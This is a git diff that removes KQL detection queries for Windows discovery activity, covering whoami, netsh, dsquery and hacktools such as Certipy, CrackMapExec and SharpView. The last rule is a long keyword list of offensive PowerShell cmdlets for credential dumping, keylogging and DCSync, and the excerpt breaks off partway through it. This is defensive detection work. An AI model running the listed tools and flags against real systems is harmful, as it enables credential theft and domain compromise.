@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/16
-// Level: medium
-// Description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.
-// Tags: attack.discovery, attack.t1518
-DeviceProcessEvents
-| where (ProcessCommandLine contains "query" and ProcessCommandLine contains "\\software\\" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "svcversion") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/Discovery/DirLister_Execution.kql b/Discovery/DirLister_Execution.kql
deleted file mode 100644
index d5da06cb..00000000
--- a/Discovery/DirLister_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/20
-// Level: low
-// Description: Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.
-// Tags: attack.discovery, attack.t1083
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "DirLister.exe" or FolderPath endswith "\\dirlister.exe"
\ No newline at end of file
diff --git a/Discovery/Discovery_of_a_System_Time.kql b/Discovery/Discovery_of_a_System_Time.kql
deleted file mode 100644
index c46edd34..00000000
--- a/Discovery/Discovery_of_a_System_Time.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019/10/24
-// Level: low
-// Description: Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.
-// Tags: attack.discovery, attack.t1124
-DeviceProcessEvents
-| where (ProcessCommandLine contains "time" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "tz" and FolderPath endswith "\\w32tm.exe")
\ No newline at end of file
diff --git a/Discovery/Domain_Trust_Discovery_Via_Dsquery.kql b/Discovery/Domain_Trust_Discovery_Via_Dsquery.kql
deleted file mode 100644
index b4f3e67d..00000000
--- a/Discovery/Domain_Trust_Discovery_Via_Dsquery.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus, Tony Lambert, oscd.community, omkar72
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects execution of "dsquery.exe" for domain trust discovery
-// Tags: attack.discovery, attack.t1482
-DeviceProcessEvents
-| where ProcessCommandLine contains "trustedDomain" and (FolderPath endswith "\\dsquery.exe" or ProcessVersionInfoOriginalFileName =~ "dsquery.exe")
\ No newline at end of file
diff --git a/Discovery/DriverQuery.EXE_Execution.kql b/Discovery/DriverQuery.EXE_Execution.kql
deleted file mode 100644
index 3320ae10..00000000
--- a/Discovery/DriverQuery.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/19
-// Level: medium
-// Description: Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers
-// Tags: attack.discovery
-DeviceProcessEvents
-| where (FolderPath endswith "driverquery.exe" or ProcessVersionInfoOriginalFileName =~ "drvqry.exe") and (not(((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/Discovery/Enumerate_All_Information_With_Whoami.EXE.kql b/Discovery/Enumerate_All_Information_With_Whoami.EXE.kql
deleted file mode 100644
index f77ae57d..00000000
--- a/Discovery/Enumerate_All_Information_With_Whoami.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/12/04
-// Level: medium
-// Description: Detects the execution of "whoami.exe" with the "/all" flag
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -all" or ProcessCommandLine contains " /all") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/Discovery/File_And_SubFolder_Enumeration_Via_Dir_Command.kql b/Discovery/File_And_SubFolder_Enumeration_Via_Dir_Command.kql
deleted file mode 100644
index 18888bf8..00000000
--- a/Discovery/File_And_SubFolder_Enumeration_Via_Dir_Command.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: frack113
-// Date: 2021/12/13
-// Level: low
-// Description: Detects usage of the "dir" command part of Widows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories.
-
-// Tags: attack.discovery, attack.t1217
-DeviceProcessEvents
-| where (ProcessCommandLine =~ "*dir*-s*" or ProcessCommandLine =~ "*dir*/s*") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Discovery/Firewall_Configuration_Discovery_Via_Netsh.EXE.kql b/Discovery/Firewall_Configuration_Discovery_Via_Netsh.EXE.kql
deleted file mode 100644
index 01471760..00000000
--- a/Discovery/Firewall_Configuration_Discovery_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
-// Date: 2021/12/07
-// Level: low
-// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
-// Tags: attack.discovery, attack.t1016
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "config " or ProcessCommandLine contains "state " or ProcessCommandLine contains "rule " or ProcessCommandLine contains "name=all") and (ProcessCommandLine contains "netsh " and ProcessCommandLine contains "show " and ProcessCommandLine contains "firewall ")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Discovery/Fsutil_Drive_Enumeration.kql b/Discovery/Fsutil_Drive_Enumeration.kql
deleted file mode 100644
index 32735e4a..00000000
--- a/Discovery/Fsutil_Drive_Enumeration.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
-// Date: 2022/03/29
-// Level: low
-// Description: Attackers may leverage fsutil to enumerated connected drives.
-// Tags: attack.discovery, attack.t1120
-DeviceProcessEvents
-| where ProcessCommandLine contains "drives" and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe")
\ No newline at end of file
diff --git a/Discovery/GatherNetworkInfo.VBS_Reconnaissance_Script_Output.kql b/Discovery/GatherNetworkInfo.VBS_Reconnaissance_Script_Output.kql
deleted file mode 100644
index d9c727d8..00000000
--- a/Discovery/GatherNetworkInfo.VBS_Reconnaissance_Script_Output.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/08
-// Level: medium
-// Description: Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".
-// Tags: attack.discovery
-DeviceFileEvents
-| where (FolderPath endswith "\\Hotfixinfo.txt" or FolderPath endswith "\\netiostate.txt" or FolderPath endswith "\\sysportslog.txt" or FolderPath endswith "\\VmSwitchLog.evtx") and FolderPath startswith "C:\\Windows\\System32\\config"
\ No newline at end of file
diff --git a/Discovery/Gpresult_Display_Group_Policy_Information.kql b/Discovery/Gpresult_Display_Group_Policy_Information.kql
deleted file mode 100644
index b1461815..00000000
--- a/Discovery/Gpresult_Display_Group_Policy_Information.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/01
-// Level: medium
-// Description: Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information
-// Tags: attack.discovery, attack.t1615
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/z" or ProcessCommandLine contains "/v") and FolderPath endswith "\\gpresult.exe"
\ No newline at end of file
diff --git a/Discovery/Group_Membership_Reconnaissance_Via_Whoami.EXE.kql b/Discovery/Group_Membership_Reconnaissance_Via_Whoami.EXE.kql
deleted file mode 100644
index 07d24c69..00000000
--- a/Discovery/Group_Membership_Reconnaissance_Via_Whoami.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/28
-// Level: medium
-// Description: Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.
-// Tags: attack.discovery, attack.t1033
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /groups" or ProcessCommandLine contains " -groups") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/Discovery/HackTool_-_Certify_Execution.kql b/Discovery/HackTool_-_Certify_Execution.kql
deleted file mode 100644
index 1f56d25c..00000000
--- a/Discovery/HackTool_-_Certify_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.
-// Tags: attack.discovery, attack.credential_access, attack.t1649
-DeviceProcessEvents
-| where (FolderPath endswith "\\Certify.exe" or ProcessVersionInfoOriginalFileName =~ "Certify.exe" or ProcessVersionInfoFileDescription contains "Certify") or ((ProcessCommandLine contains ".exe cas " or ProcessCommandLine contains ".exe find " or ProcessCommandLine contains ".exe pkiobjects " or ProcessCommandLine contains ".exe request " or ProcessCommandLine contains ".exe download ") and (ProcessCommandLine contains " /vulnerable" or ProcessCommandLine contains " /template:" or ProcessCommandLine contains " /altname:" or ProcessCommandLine contains " /domain:" or ProcessCommandLine contains " /path:" or ProcessCommandLine contains " /ca:"))
\ No newline at end of file
diff --git a/Discovery/HackTool_-_Certipy_Execution.kql b/Discovery/HackTool_-_Certipy_Execution.kql
deleted file mode 100644
index 39f45158..00000000
--- a/Discovery/HackTool_-_Certipy_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.
-// Tags: attack.discovery, attack.credential_access, attack.t1649
-DeviceProcessEvents
-| where (FolderPath endswith "\\Certipy.exe" or ProcessVersionInfoOriginalFileName =~ "Certipy.exe" or ProcessVersionInfoFileDescription contains "Certipy") or ((ProcessCommandLine contains " auth " or ProcessCommandLine contains " find " or ProcessCommandLine contains " forge " or ProcessCommandLine contains " relay " or ProcessCommandLine contains " req " or ProcessCommandLine contains " shadow ") and (ProcessCommandLine contains " -bloodhound" or ProcessCommandLine contains " -ca-pfx " or ProcessCommandLine contains " -dc-ip " or ProcessCommandLine contains " -kirbi" or ProcessCommandLine contains " -old-bloodhound" or ProcessCommandLine contains " -pfx " or ProcessCommandLine contains " -target" or ProcessCommandLine contains " -username " or ProcessCommandLine contains " -vulnerable" or ProcessCommandLine contains "auth -pfx" or ProcessCommandLine contains "shadow auto" or ProcessCommandLine contains "shadow list"))
\ No newline at end of file
diff --git a/Discovery/HackTool_-_CrackMapExec_Execution.kql b/Discovery/HackTool_-_CrackMapExec_Execution.kql
deleted file mode 100644
index 2272759d..00000000
--- a/Discovery/HackTool_-_CrackMapExec_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.credential_access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201
-DeviceProcessEvents
-| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 "))
\ No newline at end of file
diff --git a/Discovery/HackTool_-_SharpLDAPmonitor_Execution.kql b/Discovery/HackTool_-_SharpLDAPmonitor_Execution.kql
deleted file mode 100644
index 0bdef452..00000000
--- a/Discovery/HackTool_-_SharpLDAPmonitor_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/30
-// Level: medium
-// Description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.
-// Tags: attack.discovery
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/user:" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/dcip:") or (FolderPath endswith "\\SharpLDAPmonitor.exe" or ProcessVersionInfoOriginalFileName =~ "SharpLDAPmonitor.exe")
\ No newline at end of file
diff --git a/Discovery/HackTool_-_SharpLdapWhoami_Execution.kql b/Discovery/HackTool_-_SharpLdapWhoami_Execution.kql
deleted file mode 100644
index e3ed1e0a..00000000
--- a/Discovery/HackTool_-_SharpLdapWhoami_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/08/29
-// Level: high
-// Description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where (ProcessCommandLine endswith " /method:ntlm" or ProcessCommandLine endswith " /method:kerb" or ProcessCommandLine endswith " /method:nego" or ProcessCommandLine endswith " /m:nego" or ProcessCommandLine endswith " /m:ntlm" or ProcessCommandLine endswith " /m:kerb") or FolderPath endswith "\\SharpLdapWhoami.exe" or (ProcessVersionInfoOriginalFileName contains "SharpLdapWhoami" or ProcessVersionInfoProductName =~ "SharpLdapWhoami")
\ No newline at end of file
diff --git a/Discovery/HackTool_-_SharpView_Execution.kql b/Discovery/HackTool_-_SharpView_Execution.kql
deleted file mode 100644
index 4af5cead..00000000
--- a/Discovery/HackTool_-_SharpView_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/10
-// Level: high
-// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
-// Tags: attack.discovery, attack.t1049, attack.t1069.002, attack.t1482, attack.t1135, attack.t1033
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "SharpView.exe" or FolderPath endswith "\\SharpView.exe" or (ProcessCommandLine contains "Add-RemoteConnection" or ProcessCommandLine contains "Convert-ADName" or ProcessCommandLine contains "ConvertFrom-SID" or ProcessCommandLine contains "ConvertFrom-UACValue" or ProcessCommandLine contains "Convert-SidToName" or ProcessCommandLine contains "Export-PowerViewCSV" or ProcessCommandLine contains "Find-DomainObjectPropertyOutlier" or ProcessCommandLine contains "Find-DomainProcess" or ProcessCommandLine contains "Find-DomainShare" or ProcessCommandLine contains "Find-DomainUserEvent" or ProcessCommandLine contains "Find-DomainUserLocation" or ProcessCommandLine contains "Find-ForeignGroup" or ProcessCommandLine contains "Find-ForeignUser" or ProcessCommandLine contains "Find-GPOComputerAdmin" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-Interesting" or ProcessCommandLine contains "Find-LocalAdminAccess" or ProcessCommandLine contains "Find-ManagedSecurityGroups" or ProcessCommandLine contains "Get-CachedRDPConnection" or ProcessCommandLine contains "Get-DFSshare" or ProcessCommandLine contains "Get-DomainComputer" or ProcessCommandLine contains "Get-DomainController" or ProcessCommandLine contains "Get-DomainDFSShare" or ProcessCommandLine contains "Get-DomainDNSRecord" or ProcessCommandLine contains "Get-DomainFileServer" or ProcessCommandLine contains "Get-DomainForeign" or ProcessCommandLine contains "Get-DomainGPO" or ProcessCommandLine contains "Get-DomainGroup" or ProcessCommandLine contains "Get-DomainGUIDMap" or ProcessCommandLine contains "Get-DomainManagedSecurityGroup" or ProcessCommandLine contains "Get-DomainObject" or ProcessCommandLine contains "Get-DomainOU" or ProcessCommandLine contains "Get-DomainPolicy" or ProcessCommandLine contains "Get-DomainSID" or ProcessCommandLine contains "Get-DomainSite" or ProcessCommandLine contains "Get-DomainSPNTicket" or ProcessCommandLine contains "Get-DomainSubnet" or ProcessCommandLine contains "Get-DomainTrust" or ProcessCommandLine contains "Get-DomainUserEvent" or ProcessCommandLine contains "Get-ForestDomain" or ProcessCommandLine contains "Get-ForestGlobalCatalog" or ProcessCommandLine contains "Get-ForestTrust" or ProcessCommandLine contains "Get-GptTmpl" or ProcessCommandLine contains "Get-GroupsXML" or ProcessCommandLine contains "Get-LastLoggedOn" or ProcessCommandLine contains "Get-LoggedOnLocal" or ProcessCommandLine contains "Get-NetComputer" or ProcessCommandLine contains "Get-NetDomain" or ProcessCommandLine contains "Get-NetFileServer" or ProcessCommandLine contains "Get-NetForest" or ProcessCommandLine contains "Get-NetGPO" or ProcessCommandLine contains "Get-NetGroupMember" or ProcessCommandLine contains "Get-NetLocalGroup" or ProcessCommandLine contains "Get-NetLoggedon" or ProcessCommandLine contains "Get-NetOU" or ProcessCommandLine contains "Get-NetProcess" or ProcessCommandLine contains "Get-NetRDPSession" or ProcessCommandLine contains "Get-NetSession" or ProcessCommandLine contains "Get-NetShare" or ProcessCommandLine contains "Get-NetSite" or ProcessCommandLine contains "Get-NetSubnet" or ProcessCommandLine contains "Get-NetUser" or ProcessCommandLine contains "Get-PathAcl" or ProcessCommandLine contains "Get-PrincipalContext" or ProcessCommandLine contains "Get-RegistryMountedDrive" or ProcessCommandLine contains "Get-RegLoggedOn" or ProcessCommandLine contains "Get-WMIRegCachedRDPConnection" or ProcessCommandLine contains "Get-WMIRegLastLoggedOn" or ProcessCommandLine contains "Get-WMIRegMountedDrive" or ProcessCommandLine contains "Get-WMIRegProxy" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-CheckLocalAdminAccess" or ProcessCommandLine contains "Invoke-Kerberoast" or ProcessCommandLine contains "Invoke-MapDomainTrust" or ProcessCommandLine contains "Invoke-RevertToSelf" or ProcessCommandLine contains "Invoke-Sharefinder" or ProcessCommandLine contains "Invoke-UserImpersonation" or ProcessCommandLine contains "Remove-DomainObjectAcl" or ProcessCommandLine contains "Remove-RemoteConnection" or ProcessCommandLine contains "Request-SPNTicket" or ProcessCommandLine contains "Set-DomainObject" or ProcessCommandLine contains "Test-AdminAccess")
\ No newline at end of file
diff --git a/Discovery/HackTool_-_TruffleSnout_Execution.kql b/Discovery/HackTool_-_TruffleSnout_Execution.kql
deleted file mode 100644
index 332dd084..00000000
--- a/Discovery/HackTool_-_TruffleSnout_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/20
-// Level: high
-// Description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.
-// Tags: attack.discovery, attack.t1482
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "TruffleSnout.exe" or FolderPath endswith "\\TruffleSnout.exe"
\ No newline at end of file
diff --git a/Discovery/HackTool_-_WinPwn_Execution.kql b/Discovery/HackTool_-_WinPwn_Execution.kql
deleted file mode 100644
index bd621578..00000000
--- a/Discovery/HackTool_-_WinPwn_Execution.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/12/04
-// Level: high
-// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
-
-// Tags: attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1"
\ No newline at end of file
diff --git a/Discovery/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql b/Discovery/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql
deleted file mode 100644
index 7d6acba4..00000000
--- a/Discovery/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), oscd.community
-// Date: 2020/04/20
-// Level: medium
-// Description: Detect the harvesting of wifi credentials using netsh.exe
-// Tags: attack.discovery, attack.credential_access, attack.t1040
-DeviceProcessEvents
-| where (ProcessCommandLine contains "wlan" and ProcessCommandLine contains " s" and ProcessCommandLine contains " p" and ProcessCommandLine contains " k" and ProcessCommandLine contains "=clear") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Discovery/Local_Accounts_Discovery.kql b/Discovery/Local_Accounts_Discovery.kql
deleted file mode 100644
index c0632ae6..00000000
--- a/Discovery/Local_Accounts_Discovery.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-// Date: 2019/10/21
-// Level: low
-// Description: Local accounts, System Owner/User discovery using operating systems utilities
-// Tags: attack.discovery, attack.t1033, attack.t1087.001
-DeviceProcessEvents
-| where (((ProcessCommandLine contains " /c" and ProcessCommandLine contains "dir " and ProcessCommandLine contains "\\Users\\") and FolderPath endswith "\\cmd.exe") and (not(ProcessCommandLine contains " rmdir "))) or ((ProcessCommandLine contains "user" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) and (not((ProcessCommandLine contains "/domain" or ProcessCommandLine contains "/add" or ProcessCommandLine contains "/delete" or ProcessCommandLine contains "/active" or ProcessCommandLine contains "/expires" or ProcessCommandLine contains "/passwordreq" or ProcessCommandLine contains "/scriptpath" or ProcessCommandLine contains "/times" or ProcessCommandLine contains "/workstations")))) or ((ProcessCommandLine contains " /l" and FolderPath endswith "\\cmdkey.exe") or (FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\quser.exe" or FolderPath endswith "\\qwinsta.exe") or ((ProcessCommandLine contains "useraccount" and ProcessCommandLine contains "get") and FolderPath endswith "\\wmic.exe"))
\ No newline at end of file
diff --git a/Discovery/Local_Groups_Reconnaissance_Via_Wmic.EXE.kql b/Discovery/Local_Groups_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index a64283b9..00000000
--- a/Discovery/Local_Groups_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: frack113
-// Date: 2021/12/12
-// Level: low
-// Description: Detects the execution of "wmic" with the "group" flag.
-Adversaries may attempt to find local system groups and permission settings.
-The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.
-Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
-
-// Tags: attack.discovery, attack.t1069.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " group" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Discovery/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql b/Discovery/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql
deleted file mode 100644
index dd255075..00000000
--- a/Discovery/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/02
-// Level: high
-// Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
-// Tags: attack.execution, attack.discovery, attack.t1482, attack.t1087, attack.t1087.001, attack.t1087.002, attack.t1069.001, attack.t1069.002, attack.t1069, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "Add-Exfiltration" or ProcessCommandLine contains "Add-Persistence" or ProcessCommandLine contains "Add-RegBackdoor" or ProcessCommandLine contains "Add-RemoteRegBackdoor" or ProcessCommandLine contains "Add-ScrnSaveBackdoor" or ProcessCommandLine contains "Check-VM" or ProcessCommandLine contains "ConvertTo-Rc4ByteStream" or ProcessCommandLine contains "Decrypt-Hash" or ProcessCommandLine contains "Disable-ADIDNSNode" or ProcessCommandLine contains "Disable-MachineAccount" or ProcessCommandLine contains "Do-Exfiltration" or ProcessCommandLine contains "Enable-ADIDNSNode" or ProcessCommandLine contains "Enable-MachineAccount" or ProcessCommandLine contains "Enabled-DuplicateToken" or ProcessCommandLine contains "Exploit-Jboss" or ProcessCommandLine contains "Export-ADR" or ProcessCommandLine contains "Export-ADRCSV" or ProcessCommandLine contains "Export-ADRExcel" or ProcessCommandLine contains "Export-ADRHTML" or ProcessCommandLine contains "Export-ADRJSON" or ProcessCommandLine contains "Export-ADRXML" or ProcessCommandLine contains "Find-Fruit" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-TrustedDocuments" or ProcessCommandLine contains "Get-ADIDNS" or ProcessCommandLine contains "Get-ApplicationHost" or ProcessCommandLine contains "Get-ChromeDump" or ProcessCommandLine contains "Get-ClipboardContents" or ProcessCommandLine contains "Get-FoxDump" or ProcessCommandLine contains "Get-GPPPassword" or ProcessCommandLine contains "Get-IndexedItem" or ProcessCommandLine contains "Get-KerberosAESKey" or ProcessCommandLine contains "Get-Keystrokes" or ProcessCommandLine contains "Get-LSASecret" or ProcessCommandLine contains "Get-MachineAccountAttribute" or ProcessCommandLine contains "Get-MachineAccountCreator" or ProcessCommandLine contains "Get-PassHashes" or ProcessCommandLine contains "Get-RegAlwaysInstallElevated" or ProcessCommandLine contains "Get-RegAutoLogon" or ProcessCommandLine contains "Get-RemoteBootKey" or ProcessCommandLine contains "Get-RemoteCachedCredential" or ProcessCommandLine contains "Get-RemoteLocalAccountHash" or ProcessCommandLine contains "Get-RemoteLSAKey" or ProcessCommandLine contains "Get-RemoteMachineAccountHash" or ProcessCommandLine contains "Get-RemoteNLKMKey" or ProcessCommandLine contains "Get-RickAstley" or ProcessCommandLine contains "Get-Screenshot" or ProcessCommandLine contains "Get-SecurityPackages" or ProcessCommandLine contains "Get-ServiceFilePermission" or ProcessCommandLine contains "Get-ServicePermission" or ProcessCommandLine contains "Get-ServiceUnquoted" or ProcessCommandLine contains "Get-SiteListPassword" or ProcessCommandLine contains "Get-System" or ProcessCommandLine contains "Get-TimedScreenshot" or ProcessCommandLine contains "Get-UnattendedInstallFile" or ProcessCommandLine contains "Get-Unconstrained" or ProcessCommandLine contains "Get-USBKeystrokes" or ProcessCommandLine contains "Get-VaultCredential" or ProcessCommandLine contains "Get-VulnAutoRun" or ProcessCommandLine contains "Get-VulnSchTask" or ProcessCommandLine contains "Grant-ADIDNSPermission" or ProcessCommandLine contains "Gupt-Backdoor" or ProcessCommandLine contains "HTTP-Login" or ProcessCommandLine contains "Install-ServiceBinary" or ProcessCommandLine contains "Install-SSP" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-ADRecon" or ProcessCommandLine contains "Invoke-ADSBackdoor" or ProcessCommandLine contains "Invoke-AgentSmith" or ProcessCommandLine contains "Invoke-AllChecks" or ProcessCommandLine contains "Invoke-ARPScan" or ProcessCommandLine contains "Invoke-AzureHound" or ProcessCommandLine contains "Invoke-BackdoorLNK" or ProcessCommandLine contains "Invoke-BadPotato" or ProcessCommandLine contains "Invoke-BetterSafetyKatz" or ProcessCommandLine contains "Invoke-BypassUAC" or ProcessCommandLine contains "Invoke-Carbuncle" or ProcessCommandLine contains "Invoke-Certify" or ProcessCommandLine contains "Invoke-ConPtyShell" or ProcessCommandLine contains "Invoke-CredentialInjection" or ProcessCommandLine contains "Invoke-DAFT" or ProcessCommandLine contains "Invoke-DCSync" or ProcessCommandLine contains "Invoke-DinvokeKatz" or ProcessCommandLine contains "Invoke-DllInjection" or ProcessCommandLine contains "Invoke-DNSUpdate" or ProcessCommandLine contains "Invoke-DomainPasswordSpray" or ProcessCommandLine contains "Invoke-DowngradeAccount" or ProcessCommandLine contains "Invoke-EgressCheck" or ProcessCommandLine contains "Invoke-Eyewitness" or ProcessCommandLine contains "Invoke-FakeLogonScreen" or ProcessCommandLine contains "Invoke-Farmer" or ProcessCommandLine contains "Invoke-Get-RBCD-Threaded" or ProcessCommandLine contains "Invoke-Gopher" or ProcessCommandLine contains "Invoke-Grouper" or ProcessCommandLine contains "Invoke-HandleKatz" or ProcessCommandLine contains "Invoke-ImpersonatedProcess" or ProcessCommandLine contains "Invoke-ImpersonateSystem" or ProcessCommandLine contains "Invoke-InteractiveSystemPowerShell" or ProcessCommandLine contains "Invoke-Internalmonologue" or ProcessCommandLine contains "Invoke-Inveigh" or ProcessCommandLine contains 